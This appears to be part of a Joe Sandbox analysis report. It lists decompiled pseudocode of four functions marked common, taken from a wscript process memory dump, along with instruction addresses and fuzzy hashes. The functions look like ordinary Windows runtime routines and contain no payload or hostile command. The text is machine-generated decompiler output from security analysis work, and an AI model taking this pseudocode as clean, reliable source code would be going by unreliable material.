0x059452ce
0x059452d9
0x059452dd
0x059452e7
0x059452f7
0x059452f9
0x059452fd
0x059a0dcf
0x059a0dd5
0x059a0dd6
0x059a0dd7
0x059a0dd8
0x059a0dd9
0x059a0dde
0x059a0ddf
0x059a0de0
0x059a0de1
0x059a0de2
0x059a0de5
0x059a0dea
0x059a0dec
0x059a0f60
0x059a0f64
0x059a0f70
0x059a0f76
0x059a0f79
0x059a0f79
0x00000000
0x059a0f64
0x059a0df2
0x059a0df7
0x059a0e04
0x059a0e0d
0x059a0e0d
0x059a0e10
0x059a0e1a
0x059a0e1c
0x059a0e4c
0x059a0e52
0x059a0e61
0x059a0e67
0x059a0e6b
0x059a0e70
0x059a0e76
0x059a0ed7
0x059a0edc
0x059a0ee0
0x059a0ee6
0x059a0eea
0x059a0eed
0x059a0ef0
0x059a0ef3
0x059a0ef6
0x059a0ef9
0x059a0efe
0x059a0f01
0x059a0f01
0x059a0f0b
0x059a0f12
0x059a0f16
0x059a0f18
0x059a0f1b
0x059a0f2c
0x059a0f31
0x059a0f31
0x059a0f35
0x059a0f39
0x059a0f3a
0x059a0f3c
0x059a0f3f
0x059a0f50
0x059a0f55
0x059a0f55
0x059a0f59
0x059452eb
0x059452f1
0x059452f1
0x059a0e7d
0x059a0e84
0x059a0e88
0x059a0e8a
0x059a0e8d
0x059a0e9e
0x059a0ea3
0x059a0ea3
0x059a0ea7
0x059a0eaf
0x059a0eb3
0x059a0eb9
0x059a0eb9
0x059a0ebc
0x059a0ecd
0x059a0ecd
0x00000000
0x059a0eb3
0x059a0e21
0x059a0e2b
0x059a0e2f
0x059a0e30
0x059a0e3a
0x059a0e3f
0x059a0e41
0x00000000
0x00000000
0x059a0e47
0x00000000
0x059a0e47
0x059a0df9
0x059a0dfe
0x00000000
0x00000000
0x00000000
0x059a0dfe
0x05945303
0x05945307
0x00000000
0x05945309
0x00000000
0x05945309
0x05945307
0x059452e9
0x059452e9
0x00000000
0x059452e9
0x0594530e
0x00000000

Memory Dump Source

Source File: 00000001.00000002.566831763.0000000005920000.00000040.00000800.00020000.00000000.sdmp, Offset: 05920000, based on PE: true

Associated: 00000001.00000002.569224633.0000000005A3B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.569256565.0000000005A3F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5920000_wscript.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: da908882e0caea039c971fe9274bbd92ac2f4d8acd4973075e280928ab74f39e
Instruction ID: 5f8b6e2efaea32fbe8446bb5a94dab712a5167af9525ee31e20fa0cffadb5973
Opcode Fuzzy Hash: da908882e0caea039c971fe9274bbd92ac2f4d8acd4973075e280928ab74f39e
Instruction Fuzzy Hash: 0151AD71205342ABC721EFA4C849F2BBBA9FF80714F15491AF89587651E774F904CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 05972AE4 Relevance: .2, Instructions: 159
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E05972AE4(intOrPtr* __ecx, intOrPtr __edx, signed int _a4, short* _a8, intOrPtr _a12, signed int* _a16) {
				signed short* _v8;
				signed short* _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr* _v28;
				signed int _v32;
				signed int _v36;
				short _t56;
				signed int _t57;
				intOrPtr _t58;
				signed short* _t61;
				intOrPtr _t72;
				intOrPtr _t75;
				intOrPtr _t84;
				intOrPtr _t87;
				intOrPtr* _t90;
				signed short* _t91;
				signed int _t95;
				signed short* _t96;
				intOrPtr _t97;
				intOrPtr _t102;
				signed int _t108;
				intOrPtr _t110;
				signed int _t111;
				signed short* _t112;
				void* _t113;
				signed int _t116;
				signed short** _t119;
				short* _t120;
				signed int _t123;
				signed int _t124;
				void* _t125;
				intOrPtr _t127;
				signed int _t128;

				_t90 = __ecx;
				_v16 = __edx;
				_t108 = _a4;
				_v28 = __ecx;
				_t4 = _t108 - 1; // -1
				if(_t4 > 0x13) {
					L15:
					_t56 = 0xc0000100;
					L16:
					return _t56;
				}
				_t57 = _t108 * 0x1c;
				_v32 = _t57;
				_t6 = _t57 + 0x5a38204; // 0x0
				_t123 =  *_t6;
				_t7 = _t57 + 0x5a38208; // 0x5a38207
				_t8 = _t57 + 0x5a38208; // 0x5a38207
				_t119 = _t8;
				_v36 = _t123;
				_t110 = _t7 + _t123 * 8;
				_v24 = _t110;
				_t111 = _a4;
				if(_t119 >= _t110) {
					L12:
					if(_t123 != 3) {
						_t58 =  *0x5a38450; // 0x2a717ec
						if(_t58 == 0) {
							_t58 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x48));
						}
					} else {
						_t26 = _t57 + 0x5a3821c; // 0x0
						_t58 =  *_t26;
					}
					 *_t90 = _t58;
					goto L15;
				} else {
					goto L2;
				}
				while(1) {
					_t116 =  *_t61 & 0x0000ffff;
					_t128 =  *(_t127 + _t61) & 0x0000ffff;
					if(_t116 == _t128) {
						goto L18;
					}
					L5:
					if(_t116 >= 0x61) {
						if(_t116 > 0x7a) {
							_t97 =  *0x5a36d5c; // 0x7fdb0654
							_t72 =  *0x5a36d5c; // 0x7fdb0654
							_t75 =  *0x5a36d5c; // 0x7fdb0654
							_t116 =  *((intOrPtr*)(_t75 + (( *(_t72 + (( *(_t97 + (_t116 >> 0x00000008 & 0x000000ff) * 2) & 0x0000ffff) + (_t116 >> 0x00000004 & 0x0000000f)) * 2) & 0x0000ffff) + (_t116 & 0x0000000f)) * 2)) + _t116 & 0x0000ffff;
						} else {
							_t116 = _t116 - 0x20;
						}
					}
					if(_t128 >= 0x61) {
						if(_t128 > 0x7a) {
							_t102 =  *0x5a36d5c; // 0x7fdb0654
							_t84 =  *0x5a36d5c; // 0x7fdb0654
							_t87 =  *0x5a36d5c; // 0x7fdb0654
							_t128 =  *((intOrPtr*)(_t87 + (( *(_t84 + (( *(_t102 + (_t128 >> 0x00000008 & 0x000000ff) * 2) & 0x0000ffff) + (_t128 >> 0x00000004 & 0x0000000f)) * 2) & 0x0000ffff) + (_t128 & 0x0000000f)) * 2)) + _t128 & 0x0000ffff;
						} else {
							_t128 = _t128 - 0x20;
						}
					}
					if(_t116 == _t128) {
						_t61 = _v12;
						_t96 = _v8;
					} else {
						_t113 = _t116 - _t128;
						L9:
						_t111 = _a4;
						if(_t113 == 0) {
							_t115 =  &(( *_t119)[_t111 + 1]);
							_t33 =  &(_t119[1]); // 0x100
							_t120 = _a8;
							_t95 =  *_t33 -  &(( *_t119)[_t111 + 1]) >> 1;
							_t35 = _t95 - 1; // 0xff
							_t124 = _t35;
							if(_t120 == 0) {
								L27:
								 *_a16 = _t95;
								_t56 = 0xc0000023;
								goto L16;
							}
							if(_t124 >= _a12) {
								if(_a12 >= 1) {
									 *_t120 = 0;
								}
								goto L27;
							}
							 *_a16 = _t124;
							_t125 = _t124 + _t124;
							E0598F3E0(_t120, _t115, _t125);
							_t56 = 0;
							 *((short*)(_t125 + _t120)) = 0;
							goto L16;
						}
						_t119 =  &(_t119[2]);
						if(_t119 < _v24) {
							L2:
							_t91 =  *_t119;
							_t61 = _t91;
							_v12 = _t61;
							_t112 =  &(_t61[_t111]);
							_v8 = _t112;
							if(_t61 >= _t112) {
								break;
							} else {
								_t127 = _v16 - _t91;
								_t96 = _t112;
								_v20 = _t127;
								_t116 =  *_t61 & 0x0000ffff;
								_t128 =  *(_t127 + _t61) & 0x0000ffff;
								if(_t116 == _t128) {
									goto L18;
								}
								goto L5;
							}
						} else {
							_t90 = _v28;
							_t57 = _v32;
							_t123 = _v36;
							goto L12;
						}
					}
					L18:
					_t61 =  &(_t61[1]);
					_v12 = _t61;
					if(_t61 >= _t96) {
						break;
					}
					_t127 = _v20;
				}
				_t113 = 0;
				goto L9;
			}

0x05972ae4
0x05972aec
0x05972aef
0x05972af4
0x05972af7
0x05972afd
0x05972b92
0x05972b92
0x05972b97
0x05972b9c
0x05972b9c
0x05972b03
0x05972b06
0x05972b09
0x05972b09
0x05972b0f
0x05972b15
0x05972b15
0x05972b1b
0x05972b1e
0x05972b21
0x05972b26
0x05972b29
0x05972b81
0x05972b84
0x05972c0e
0x05972c15
0x05972c24
0x05972c24
0x05972b8a
0x05972b8a
0x05972b8a
0x05972b8a
0x05972b90
0x00000000
0x00000000
0x00000000
0x00000000
0x05972b4a
0x05972b4a
0x05972b4d
0x05972b53
0x00000000
0x00000000
0x05972b55
0x05972b58
0x05972bb7
0x059b5d1b
0x059b5d37
0x059b5d47
0x059b5d53
0x05972bbd
0x05972bbd
0x05972bbd
0x05972bb7
0x05972b5d
0x05972c2f
0x059b5d5b
0x059b5d77
0x059b5d87
0x059b5d93
0x05972c35
0x05972c35
0x05972c35
0x05972c2f
0x05972b65
0x05972b9f
0x05972ba2
0x05972b67
0x05972b67
0x05972b69
0x05972b6b
0x05972b6e
0x05972bc9
0x05972bcc
0x05972bcf
0x05972bd4
0x05972bd6
0x05972bd6
0x05972bdb
0x05972c02
0x05972c05
0x05972c07
0x00000000
0x05972c07
0x05972be0
0x05972c00
0x05972c3f
0x05972c3f
0x00000000
0x05972c00
0x05972be5
0x05972be7
0x05972bec
0x05972bf4
0x05972bf6
0x00000000
0x05972bf6
0x05972b70
0x05972b76
0x05972b2b
0x05972b2b
0x05972b2d
0x05972b2f
0x05972b32
0x05972b35
0x05972b3a
0x00000000
0x05972b40
0x05972b43
0x05972b45
0x05972b47
0x05972b4a
0x05972b4d
0x05972b53
0x00000000
0x00000000
0x00000000
0x05972b53
0x05972b78
0x05972b78
0x05972b7b
0x05972b7e
0x00000000
0x05972b7e
0x05972b76
0x05972ba5
0x05972ba5
0x05972ba8
0x05972bad
0x00000000
0x00000000
0x05972baf
0x05972baf
0x05972bc2
0x00000000

Memory Dump Source

Source File: 00000001.00000002.566831763.0000000005920000.00000040.00000800.00020000.00000000.sdmp, Offset: 05920000, based on PE: true

Associated: 00000001.00000002.569224633.0000000005A3B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.569256565.0000000005A3F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5920000_wscript.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 76116d2353f9d7e70932f6b073994ccc015da00cf71977a4f0839d64334b9408
Instruction ID: 99a6651977c28ad7d37ee120855145ab1a07a0177b54c0d3e3e09001ae43b721
Opcode Fuzzy Hash: 76116d2353f9d7e70932f6b073994ccc015da00cf71977a4f0839d64334b9408
Instruction Fuzzy Hash: 7751E17AA2412ADFCB14CF1CC8809BDB7BAFB89700705845BF8469B314E734AA51CB90

Uniqueness

Uniqueness Score: -1.00%

Function 05A0AE44 Relevance: .2, Instructions: 152
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E05A0AE44(signed char __ecx, signed int __edx, signed int _a4, signed char _a8, signed int* _a12) {
				signed int _v8;
				signed int _v12;
				void* __esi;
				void* __ebp;
				signed short* _t36;
				signed int _t41;
				char* _t42;
				intOrPtr _t43;
				signed int _t47;
				void* _t52;
				signed int _t57;
				intOrPtr _t61;
				signed char _t62;
				signed int _t72;
				signed char _t85;
				signed int _t88;

				_t73 = __edx;
				_push(__ecx);
				_t85 = __ecx;
				_v8 = __edx;
				_t61 =  *((intOrPtr*)(__ecx + 0x28));
				_t57 = _a4 |  *(__ecx + 0xc) & 0x11000001;
				if(_t61 != 0 && _t61 ==  *((intOrPtr*)( *[fs:0x18] + 0x24))) {
					_t57 = _t57 | 0x00000001;
				}
				_t88 = 0;
				_t36 = 0;
				_t96 = _a12;
				if(_a12 == 0) {
					_t62 = _a8;
					__eflags = _t62;
					if(__eflags == 0) {
						goto L12;
					}
					_t52 = E05A0C38B(_t85, _t73, _t57, 0);
					_t62 = _a8;
					 *_t62 = _t52;
					_t36 = 0;
					goto L11;
				} else {
					_t36 = E05A0ACFD(_t85, _t73, _t96, _t57, _a8);
					if(0 == 0 || 0 == 0xffffffff) {
						_t72 = _t88;
					} else {
						_t72 =  *0x00000000 & 0x0000ffff;
					}
					 *_a12 = _t72;
					_t62 = _a8;
					L11:
					_t73 = _v8;
					L12:
					if((_t57 & 0x01000000) != 0 ||  *((intOrPtr*)(_t85 + 0x20)) == _t88) {
						L19:
						if(( *(_t85 + 0xc) & 0x10000000) == 0) {
							L22:
							_t74 = _v8;
							__eflags = _v8;
							if(__eflags != 0) {
								L25:
								__eflags = _t88 - 2;
								if(_t88 != 2) {
									__eflags = _t85 + 0x44 + (_t88 << 6);
									_t88 = E05A0FDE2(_t85 + 0x44 + (_t88 << 6), _t74, _t57);
									goto L34;
								}
								L26:
								_t59 = _v8;
								E05A0EA55(_t85, _v8, _t57);
								asm("sbb esi, esi");
								_t88 =  ~_t88;
								_t41 = E05967D50();
								__eflags = _t41;
								if(_t41 == 0) {
									_t42 = 0x7ffe0380;
								} else {
									_t42 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
								}
								__eflags =  *_t42;
								if( *_t42 != 0) {
									_t43 =  *[fs:0x30];
									__eflags =  *(_t43 + 0x240) & 0x00000001;
									if(( *(_t43 + 0x240) & 0x00000001) != 0) {
										__eflags = _t88;
										if(_t88 != 0) {
											E05A01608(_t85, _t59, 3);
										}
									}
								}
								goto L34;
							}
							_push(_t62);
							_t47 = E05A11536(0x5a38ae4, (_t74 -  *0x5a38b04 >> 0x14) + (_t74 -  *0x5a38b04 >> 0x14), _t88, __eflags);
							__eflags = _t47;
							if(_t47 == 0) {
								goto L26;
							}
							_t74 = _v12;
							_t27 = _t47 - 1; // -1
							_t88 = _t27;
							goto L25;
						}
						_t62 = _t85;
						if(L05A0C323(_t62, _v8, _t57) != 0xffffffff) {
							goto L22;
						}
						_push(_t62);
						_push(_t88);
						E05A0A80D(_t85, 9, _v8, _t88);
						goto L34;
					} else {
						_t101 = _t36;
						if(_t36 != 0) {
							L16:
							if(_t36 == 0xffffffff) {
								goto L19;
							}
							_t62 =  *((intOrPtr*)(_t36 + 2));
							if((_t62 & 0x0000000f) == 0) {
								goto L19;
							}
							_t62 = _t62 & 0xf;
							if(E059ECB1E(_t62, _t85, _v8, 3, _t36 + 8) < 0) {
								L34:
								return _t88;
							}
							goto L19;
						}
						_t62 = _t85;
						_t36 = E05A0ACFD(_t62, _t73, _t101, _t57, _t62);
						if(_t36 == 0) {
							goto L19;
						}
						goto L16;
					}
				}
			}

0x05a0ae44
0x05a0ae4c
0x05a0ae53
0x05a0ae55
0x05a0ae5c
0x05a0ae64
0x05a0ae68
0x05a0ae75
0x05a0ae75
0x05a0ae78
0x05a0ae7a
0x05a0ae7c
0x05a0ae7f
0x05a0aea8
0x05a0aeab
0x05a0aead
0x00000000
0x00000000
0x05a0aeb3
0x05a0aeb8
0x05a0aebb
0x05a0aebd
0x00000000
0x05a0ae81
0x05a0ae88
0x05a0ae8f
0x05a0ae9b
0x05a0ae96
0x05a0ae96
0x05a0ae96
0x05a0aea0
0x05a0aea3
0x05a0aebf
0x05a0aebf
0x05a0aec3
0x05a0aec9
0x05a0af0d
0x05a0af14
0x05a0af3d
0x05a0af3d
0x05a0af41
0x05a0af44
0x05a0af67
0x05a0af67
0x05a0af6a
0x05a0afca
0x05a0afd1
0x00000000
0x05a0afd1
0x05a0af6c
0x05a0af6d
0x05a0af75
0x05a0af7c
0x05a0af7e
0x05a0af80
0x05a0af85
0x05a0af87
0x05a0af99
0x05a0af89
0x05a0af92
0x05a0af92
0x05a0af9e
0x05a0afa1
0x05a0afa3
0x05a0afa9
0x05a0afb0
0x05a0afb2
0x05a0afb4
0x05a0afbc
0x05a0afbc
0x05a0afb4
0x05a0afb0
0x00000000
0x05a0afa1
0x05a0af4f
0x05a0af57
0x05a0af5c
0x05a0af5e
0x00000000
0x00000000
0x05a0af60
0x05a0af64
0x05a0af64
0x00000000
0x05a0af64
0x05a0af1a
0x05a0af25
0x00000000
0x00000000
0x05a0af27
0x05a0af28
0x05a0af33
0x00000000
0x05a0aed0
0x05a0aed0
0x05a0aed2
0x05a0aee1
0x05a0aee4
0x00000000
0x00000000
0x05a0aee6
0x05a0aeec
0x00000000
0x00000000
0x05a0aefb
0x05a0af07
0x05a0afd3
0x05a0afdb
0x05a0afdb
0x00000000
0x05a0af07
0x05a0aed6
0x05a0aed8
0x05a0aedf
0x00000000
0x00000000
0x00000000
0x05a0aedf
0x05a0aec9

Memory Dump Source

Source File: 00000001.00000002.566831763.0000000005920000.00000040.00000800.00020000.00000000.sdmp, Offset: 05920000, based on PE: true

Associated: 00000001.00000002.569224633.0000000005A3B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.569256565.0000000005A3F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5920000_wscript.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 06ef0e88ed9d07159415a2e50c9f4b5a79b150a6afa6702e24aff19ae571aa4c
Instruction ID: cc72e1a3168ed063f8d2436c1b95d26ca58411386523c965f4b5d10f84aee4fb
Opcode Fuzzy Hash: 06ef0e88ed9d07159415a2e50c9f4b5a79b150a6afa6702e24aff19ae571aa4c
Instruction Fuzzy Hash: 1A41E6B17243119BD726DB25E898F3BB79AFF84720F049619F8278B2D0DB34D801C691

Uniqueness

Uniqueness Score: -1.00%

Function 0596DBE9 Relevance: .1, Instructions: 149
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E0596DBE9(intOrPtr __ecx, intOrPtr __edx, signed int* _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v5;
				signed int _v12;
				signed int* _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				void* __ebx;
				void* __edi;
				signed int _t54;
				char* _t58;
				signed int _t66;
				intOrPtr _t67;
				intOrPtr _t68;
				intOrPtr _t72;
				intOrPtr _t73;
				signed int* _t75;
				intOrPtr _t79;
				intOrPtr _t80;
				char _t82;
				signed int _t83;
				signed int _t84;
				signed int _t88;
				signed int _t89;
				intOrPtr _t90;
				intOrPtr _t92;
				signed int _t97;
				intOrPtr _t98;
				intOrPtr* _t99;
				signed int* _t101;
				signed int* _t102;
				intOrPtr* _t103;
				intOrPtr _t105;
				signed int _t106;
				void* _t118;

				_t92 = __edx;
				_t75 = _a4;
				_t98 = __ecx;
				_v44 = __edx;
				_t106 = _t75[1];
				_v40 = __ecx;
				if(_t106 < 0 || _t106 <= 0 &&  *_t75 < 0) {
					_t82 = 0;
				} else {
					_t82 = 1;
				}
				_v5 = _t82;
				_t6 = _t98 + 0xc8; // 0xc9
				_t101 = _t6;
				 *((intOrPtr*)(_t98 + 0xd4)) = _a12;
				_v16 = _t92 + ((0 | _t82 != 0x00000000) - 0x00000001 & 0x00000048) + 8;
				 *((intOrPtr*)(_t98 + 0xd8)) = _a8;
				if(_t82 != 0) {
					 *(_t98 + 0xde) =  *(_t98 + 0xde) | 0x00000002;
					_t83 =  *_t75;
					_t54 = _t75[1];
					 *_t101 = _t83;
					_t84 = _t83 | _t54;
					_t101[1] = _t54;
					if(_t84 == 0) {
						_t101[1] = _t101[1] & _t84;
						 *_t101 = 1;
					}
					goto L19;
				} else {
					if(_t101 == 0) {
						E0594CC50(E05944510(0xc000000d));
						_t88 =  *_t101;
						_t97 = _t101[1];
						L15:
						_v12 = _t88;
						_t66 = _t88 -  *_t75;
						_t89 = _t97;
						asm("sbb ecx, [ebx+0x4]");
						_t118 = _t89 - _t97;
						if(_t118 <= 0 && (_t118 < 0 || _t66 < _v12)) {
							_t66 = _t66 | 0xffffffff;
							_t89 = 0x7fffffff;
						}
						 *_t101 = _t66;
						_t101[1] = _t89;
						L19:
						if(E05967D50() != 0) {
							_t58 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t58 = 0x7ffe0386;
						}
						_t102 = _v16;
						if( *_t58 != 0) {
							_t58 = E05A18ED6(_t102, _t98);
						}
						_t76 = _v44;
						E05962280(_t58, _v44);
						E0596DD82(_v44, _t102, _t98);
						E0596B944(_t102, _v5);
						return E0595FFB0(_t76, _t98, _t76);
					}
					_t99 = 0x7ffe03b0;
					do {
						_t103 = 0x7ffe0010;
						do {
							_t67 =  *0x5a38628; // 0x0
							_v28 = _t67;
							_t68 =  *0x5a3862c; // 0x0
							_v32 = _t68;
							_v24 =  *((intOrPtr*)(_t99 + 4));
							_v20 =  *_t99;
							while(1) {
								_t97 =  *0x7ffe000c;
								_t90 =  *0x7FFE0008;
								if(_t97 ==  *_t103) {
									goto L10;
								}
								asm("pause");
							}
							L10:
							_t79 = _v24;
							_t99 = 0x7ffe03b0;
							_v12 =  *0x7ffe03b0;
							_t72 =  *0x7FFE03B4;
							_t103 = 0x7ffe0010;
							_v36 = _t72;
						} while (_v20 != _v12 || _t79 != _t72);
						_t73 =  *0x5a38628; // 0x0
						_t105 = _v28;
						_t80 =  *0x5a3862c; // 0x0
					} while (_t105 != _t73 || _v32 != _t80);
					_t98 = _v40;
					asm("sbb edx, [ebp-0x20]");
					_t88 = _t90 - _v12 - _t105;
					_t75 = _a4;
					asm("sbb edx, eax");
					_t31 = _t98 + 0xc8; // 0x5a0fb53
					_t101 = _t31;
					 *_t101 = _t88;
					_t101[1] = _t97;
					goto L15;
				}
			}

0x0596dbe9
0x0596dbf2
0x0596dbf7
0x0596dbf9
0x0596dbfc
0x0596dc00
0x0596dc03
0x0596dc14
0x0596dd54
0x0596dd54
0x0596dd54
0x0596dc18
0x0596dc1d
0x0596dc1d
0x0596dc32
0x0596dc3b
0x0596dc3e
0x0596dc46
0x0596dd5b
0x0596dd62
0x0596dd64
0x0596dd67
0x0596dd69
0x0596dd6b
0x0596dd6e
0x0596dd70
0x0596dd73
0x0596dd73
0x00000000
0x0596dc4c
0x0596dc4e
0x059b3ae3
0x059b3ae8
0x059b3aea
0x0596dce7
0x0596dce9
0x0596dcec
0x0596dcee
0x0596dcf0
0x0596dcf3
0x0596dcf5
0x059b3af2
0x059b3af5
0x059b3af5
0x0596dd06
0x0596dd08
0x0596dd0b
0x0596dd12
0x059b3b08
0x0596dd18
0x0596dd18
0x0596dd18
0x0596dd20
0x0596dd23
0x059b3b16
0x059b3b16
0x0596dd29
0x0596dd2d
0x0596dd36
0x0596dd40
0x0596dd51
0x0596dd51
0x0596dc54
0x0596dc59
0x0596dc59
0x0596dc5e
0x0596dc5e
0x0596dc63
0x0596dc66
0x0596dc6b
0x0596dc78
0x0596dc7b
0x0596dc81
0x0596dc81
0x0596dc83
0x0596dc89
0x00000000
0x00000000
0x0596dd7b
0x0596dd7b
0x0596dc8f
0x0596dc8f
0x0596dc92
0x0596dc99
0x0596dc9f
0x0596dca5
0x0596dcaa
0x0596dcaa
0x0596dcb3
0x0596dcb8
0x0596dcbb
0x0596dcc1
0x0596dccf
0x0596dcd2
0x0596dcd5
0x0596dcd7
0x0596dcda
0x0596dcdc
0x0596dcdc
0x0596dce2
0x0596dce4
0x00000000
0x0596dce4

Memory Dump Source

Source File: 00000001.00000002.566831763.0000000005920000.00000040.00000800.00020000.00000000.sdmp, Offset: 05920000, based on PE: true

Associated: 00000001.00000002.569224633.0000000005A3B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.569256565.0000000005A3F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5920000_wscript.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6685456d284d44261c8d7d00912ef76e484cf455067a78683f43027049899de8
Instruction ID: 82a92d00cbcd22f2bf35a36dcf6d78bde4b9a56ea663ba856b4f0c48587e3ba4
Opcode Fuzzy Hash: 6685456d284d44261c8d7d00912ef76e484cf455067a78683f43027049899de8
Instruction Fuzzy Hash: 1951A1B1B01715DFCB14DF68C4A0AAEFBF6BB88310F208559D565E7340DB74A948CB90

Uniqueness

Uniqueness Score: -1.00%

Function 0595EF40 Relevance: .1, Instructions: 147
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E0595EF40(intOrPtr __ecx) {
				char _v5;
				char _v6;
				char _v7;
				char _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t58;
				char _t59;
				signed char _t69;
				void* _t73;
				signed int _t74;
				char _t79;
				signed char _t81;
				signed int _t85;
				signed int _t87;
				intOrPtr _t90;
				signed char* _t91;
				void* _t92;
				signed int _t94;
				void* _t96;

				_t90 = __ecx;
				_v16 = __ecx;
				if(( *(__ecx + 0x14) & 0x04000000) != 0) {
					_t58 =  *((intOrPtr*)(__ecx));
					if(_t58 != 0xffffffff &&  *((intOrPtr*)(_t58 + 8)) == 0) {
						E05949080(_t73, __ecx, __ecx, _t92);
					}
				}
				_t74 = 0;
				_t96 =  *0x7ffe036a - 1;
				_v12 = 0;
				_v7 = 0;
				if(_t96 > 0) {
					_t74 =  *(_t90 + 0x14) & 0x00ffffff;
					_v12 = _t74;
					_v7 = _t96 != 0;
				}
				_t79 = 0;
				_v8 = 0;
				_v5 = 0;
				while(1) {
					L4:
					_t59 = 1;
					L5:
					while(1) {
						if(_t59 == 0) {
							L12:
							_t21 = _t90 + 4; // 0x7788c21e
							_t87 =  *_t21;
							_v6 = 0;
							if(_t79 != 0) {
								if((_t87 & 0x00000002) != 0) {
									goto L19;
								}
								if((_t87 & 0x00000001) != 0) {
									_v6 = 1;
									_t74 = _t87 ^ 0x00000003;
								} else {
									_t51 = _t87 - 2; // -2
									_t74 = _t51;
								}
								goto L15;
							} else {
								if((_t87 & 0x00000001) != 0) {
									_v6 = 1;
									_t74 = _t87 ^ 0x00000001;
								} else {
									_t26 = _t87 - 4; // -4
									_t74 = _t26;
									if((_t74 & 0x00000002) == 0) {
										_t74 = _t74 - 2;
									}
								}
								L15:
								if(_t74 == _t87) {
									L19:
									E05942D8A(_t74, _t90, _t87, _t90);
									_t74 = _v12;
									_v8 = 1;
									if(_v7 != 0 && _t74 > 0x64) {
										_t74 = _t74 - 1;
										_v12 = _t74;
									}
									_t79 = _v5;
									goto L4;
								}
								asm("lock cmpxchg [esi], ecx");
								if(_t87 != _t87) {
									_t74 = _v12;
									_t59 = 0;
									_t79 = _v5;
									continue;
								}
								if(_v6 != 0) {
									_t74 = _v12;
									L25:
									if(_v7 != 0) {
										if(_t74 < 0x7d0) {
											if(_v8 == 0) {
												_t74 = _t74 + 1;
											}
										}
										_t38 = _t90 + 0x14; // 0x0
										_t39 = _t90 + 0x14; // 0x0
										_t85 = ( *_t38 ^ _t74) & 0x00ffffff ^  *_t39;
										if( *((intOrPtr*)( *[fs:0x30] + 0x64)) == 1) {
											_t85 = _t85 & 0xff000000;
										}
										 *(_t90 + 0x14) = _t85;
									}
									 *((intOrPtr*)(_t90 + 0xc)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
									 *((intOrPtr*)(_t90 + 8)) = 1;
									return 0;
								}
								_v5 = 1;
								_t87 = _t74;
								goto L19;
							}
						}
						_t94 = _t74;
						_v20 = 1 + (0 | _t79 != 0x00000000) * 2;
						if(_t74 == 0) {
							goto L12;
						} else {
							_t91 = _t90 + 4;
							goto L8;
							L9:
							while((_t81 & 0x00000001) != 0) {
								_t69 = _t81;
								asm("lock cmpxchg [edi], edx");
								if(_t69 != _t81) {
									_t81 = _t69;
									continue;
								}
								_t90 = _v16;
								goto L25;
							}
							asm("pause");
							_t94 = _t94 - 1;
							if(_t94 != 0) {
								L8:
								_t81 =  *_t91;
								goto L9;
							} else {
								_t90 = _v16;
								_t79 = _v5;
								goto L12;
							}
						}
					}
				}
			}

0x0595ef4b
0x0595ef4d
0x0595ef57
0x0595f0bd
0x0595f0c2
0x0595f0d2
0x0595f0d2
0x0595f0c2
0x0595ef5d
0x0595ef5f
0x0595ef67
0x0595ef6a
0x0595ef6d
0x0595ef74
0x0595ef7f
0x0595ef82
0x0595ef82
0x0595ef86
0x0595ef88
0x0595ef8c
0x0595ef8f
0x0595ef8f
0x0595ef8f
0x00000000
0x0595ef91
0x0595ef93
0x0595efc4
0x0595efc4
0x0595efc4
0x0595efca
0x0595efd0
0x0595f0a6
0x00000000
0x00000000
0x0595f0af
0x059abb06
0x059abb0a
0x0595f0b5
0x0595f0b5
0x0595f0b5
0x0595f0b5
0x00000000
0x0595efd6
0x0595efd9
0x0595f0de
0x0595f0e2
0x0595efdf
0x0595efdf
0x0595efdf
0x0595efe5
0x059abafc
0x059abafc
0x0595efe5
0x0595efeb
0x0595efed
0x0595f00f
0x0595f011
0x0595f01a
0x0595f01d
0x0595f021
0x0595f028
0x0595f029
0x0595f029
0x0595f02c
0x00000000
0x0595f02c
0x0595eff3
0x0595eff9
0x0595f0ea
0x0595f0ed
0x0595f0ef
0x00000000
0x0595f0ef
0x0595f003
0x059abb12
0x0595f045
0x0595f049
0x0595f051
0x0595f09e
0x0595f0a0
0x0595f0a0
0x0595f09e
0x0595f053
0x0595f064
0x0595f064
0x0595f06b
0x059abb1a
0x059abb1a
0x0595f071
0x0595f071
0x0595f07d
0x0595f082
0x0595f08f
0x0595f08f
0x0595f009
0x0595f00d
0x00000000
0x0595f00d
0x0595efd0
0x0595ef97
0x0595efa5
0x0595efaa
0x00000000
0x0595efac
0x0595efac
0x0595efac
0x00000000
0x0595efb2
0x0595f036
0x0595f03a
0x0595f040
0x0595f090
0x00000000
0x0595f092
0x0595f042
0x00000000
0x0595f042
0x0595efb7
0x0595efb9
0x0595efbc
0x0595efb0
0x0595efb0
0x00000000
